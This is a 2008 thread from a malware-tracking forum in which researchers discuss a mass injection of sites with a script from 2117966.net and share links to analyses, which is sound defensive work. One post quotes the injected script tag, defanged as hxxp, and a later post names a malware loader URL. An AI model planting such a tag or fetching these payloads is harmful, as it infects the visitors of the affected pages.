Malware Domain List

Malware Related => Malicious Domains => Topic started by: cjeremy on March 14, 2008, 03:58:34 pm

Title: 2117966.net fuckjp.js
Post by: cjeremy on March 14, 2008, 03:58:34 pm
Saw this on SANS this morning: http://isc.sans.org/diary.html?storyid=4139  and I know Steven Adair from the Shadow Server Foundation... and he is a really sharp guy that posted more details here: http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313  and his personal blog is here: http://www.securityzone.org/

Doing a Google search for fuckjp.js looks like the 10,000 infected websites may be fairly accurate.

--jeremy
Title: Re: 2117966.net fuckjp.js
Post by: sowhat-x on March 14, 2008, 04:03:12 pm
Excellent info - thanks!  :)
Title: Re: 2117966.net fuckjp.js
Post by: cjeremy on March 14, 2008, 04:03:51 pm
of should have added this:

Code: [Select]
<script src=hxxp://www.2117966.net/fuckjp.js></script>
is what I have been seeing from my google search results....
Title: Re: 21179 66.net fuckjp.js
Post by: JohnC on March 14, 2008, 05:02:57 pm
This is giving a 404 at the moment. Anybody have a copy of fuckjp.js or fuckjp0.js ?
Title: Re: 2117966.net fuckjp.js
Post by: sowhat-x on March 14, 2008, 05:13:22 pm
Found this blog entries here as well...  :-\
http://www.dynamoo.com/blog/ (...scroll down a bit)
http://www.avertlabs.com/research/blog/index.php/2008/03/12/another-mass-attack-underway/
Title: Re: 2117966.net fuckjp.js
Post by: sowhat-x on March 26, 2008, 12:09:35 pm
Here you go...it's officially 'leaked' now  ;)
http://www.0x000000.com/?i=534
Title: Re: 2117966.net fuckjp.js
Post by: MysteryFCM on March 26, 2008, 02:54:49 pm
Might want to get Bobby to play with that for Malzilla ;)
Title: Re: 2117966.net fuckjp.js
Post by: bobby on March 26, 2008, 06:00:39 pm
Does not looks complete.
I'll try to trace back the variables, and get the URL if possible.
Title: Re: 2117966.net fuckjp.js
Post by: JohnC on March 27, 2008, 12:56:02 am
Looks like something along the lines of this, which is offline: a.njnk.net/cgi-bin/jl/jloader.pl?source=&system_id=none&qtver=0x